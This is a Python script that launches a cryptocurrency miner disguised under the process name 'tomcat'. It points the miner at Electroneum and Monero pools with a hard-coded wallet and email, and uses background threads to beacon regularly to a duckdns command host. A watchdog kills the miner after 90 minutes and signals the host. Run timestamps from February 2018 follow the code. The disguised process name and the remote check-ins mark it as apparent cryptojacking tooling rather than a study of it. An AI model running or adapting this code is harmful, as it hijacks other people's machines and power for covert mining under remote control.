import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:04.501257
#2018-02-17 16:54:01.620426
#2018-02-17 18:42:01.961602
#2018-02-17 20:32:06.221100
#2018-02-17 22:18:04.537833
#2018-02-18 00:02:01.655827
#2018-02-18 01:52:05.708097
#2018-02-18 03:40:01.349006
#2018-02-18 05:27:03.486250
#2018-02-18 07:19:05.143477
#2018-02-18 09:07:01.483218
#2018-02-18 10:53:06.942891
#2018-02-18 12:40:06.040740
#2018-02-18 14:27:07.131283
#2018-02-18 16:17:03.971902
#2018-02-18 18:06:05.810525
#2018-02-18 19:52:01.353097
#2018-02-18 21:38:06.053243
#2018-02-18 23:26:01.822386
#2018-02-19 01:13:01.365276
#2018-02-19 02:59:01.681698
#2018-02-19 04:46:03.970156
#2018-02-19 06:31:04.567932
#2018-02-19 08:20:06.521010
#2018-02-19 10:09:06.211363
#2018-02-19 11:58:04.405188
#2018-02-19 13:45:01.629398
#2018-02-19 15:33:08.309611
#2018-02-19 17:19:08.540076
#2018-02-19 19:07:02.026929
#2018-02-19 20:52:01.317136
#2018-02-19 22:39:06.516053
#2018-02-20 00:24:04.197756
#2018-02-20 02:11:05.974454
#2018-02-20 04:03:05.492376
#2018-02-20 05:47:02.109604
#2018-02-20 07:32:05.239698
#2018-02-20 09:17:04.784487
#2018-02-20 11:01:03.886588
#2018-02-20 12:48:07.626242
#2018-02-20 14:34:05.312478
#2018-02-20 16:19:01.867184
#2018-02-20 18:05:08.570795
#2018-02-20 19:56:01.326771
#2018-02-20 21:43:05.545051
#2018-02-20 23:23:05.618378
#2018-02-21 01:07:01.432512
#2018-02-21 02:53:05.292202
#2018-02-21 04:42:06.758463
#2018-02-21 06:30:07.990606
#2018-02-21 08:15:05.120800
#2018-02-21 10:04:06.321659
#2018-02-21 11:53:05.855478
#2018-02-21 13:43:04.214986
#2018-02-21 15:27:01.775642
#2018-02-21 17:17:05.309778
#2018-02-21 19:06:06.960096
#2018-02-21 20:54:07.502602
#2018-02-21 22:42:08.174388
#2018-02-22 00:32:01.399025
#2018-02-22 02:19:05.039877
#2018-02-22 04:06:06.117742
#2018-02-22 05:51:04.244233
#2018-02-22 07:38:06.735651
#2018-02-22 09:26:01.840348
#2018-02-22 11:12:02.138706
#2018-02-22 12:58:09.064590
#2018-02-22 14:46:06.866061
#2018-02-22 16:32:08.407866
#2018-02-22 18:17:05.848679
#2018-02-22 20:08:08.927973
#2018-02-22 21:55:08.676685
#2018-02-22 23:44:01.271746
#2018-02-23 01:32:07.384411
#2018-02-23 03:17:08.082537
#2018-02-23 05:03:04.363125
#2018-02-23 06:48:07.512681
#2018-02-23 08:39:01.688407
#2018-02-23 10:54:01.301959
#2018-02-23 12:51:06.330178
#2018-02-23 14:35:04.105018
#2018-02-23 16:24:01.923273
#2018-02-23 18:10:08.901372
#2018-02-23 19:54:01.359805
#2018-02-23 21:37:03.486816
#2018-02-23 23:25:07.722383
#2018-02-24 01:18:04.226660
#2018-02-24 03:09:05.518597
#2018-02-24 04:55:08.996389
#2018-02-24 06:40:08.628587
#2018-02-24 08:29:04.953438
#2018-02-24 10:16:05.092714
#2018-02-24 12:11:05.711654
#2018-02-24 13:58:01.315194
#2018-02-24 15:50:04.401842
#2018-02-24 17:43:06.416155
#2018-02-24 19:28:06.522626
#2018-02-24 21:18:02.174760
#2018-02-24 23:55:07.789129
#2018-02-25 04:27:03.574679
#2018-02-25 08:08:07.137699